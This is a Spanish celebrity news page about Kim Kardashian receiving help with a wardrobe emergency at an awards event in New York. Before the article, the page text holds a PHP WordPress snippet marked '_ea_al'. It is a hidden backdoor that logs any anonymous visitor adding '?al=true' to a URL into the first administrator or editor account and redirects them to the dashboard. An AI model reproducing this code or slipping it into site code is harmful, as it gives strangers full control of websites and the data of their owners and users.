// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Kim Kardashian y su “salvación” en los Magazine´s Innovator Awords - Dicomania Tu Manía
MusicManía

Kim Kardashian y su “salvación” en los Magazine´s Innovator Awords

Kimberly Noel Kardashian West más conocida como Kim Kardashian empresaria, modelo y personaje público estadounidense durante los Magazine´s Innovator Awords tuvo que recibir un poco de ayuda para mantenerse vestida en el evento.

La californiana recibió el premio a Brand Innovator 2021 en el MOMA (Museo de arte) en la ciudad de Nueva York el pasado lunes, 1ro de noviembre.

Kim subió al escenario para recibir su premio y no dudo en agradecer principalmente a el diseñador de moda Kim Jones que se encontraba en el público, “Gracias a Kim Jones porque acabo de tener una pequeña emergencia de moda”, menciono Kardashian.

Advertisements

Gracias que tenía SKIMS (su marca de lencería), o esta noche habría sido un espectáculo muy diferente”, finalmente la modelo estadounidense cerró el tema con este comentario.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top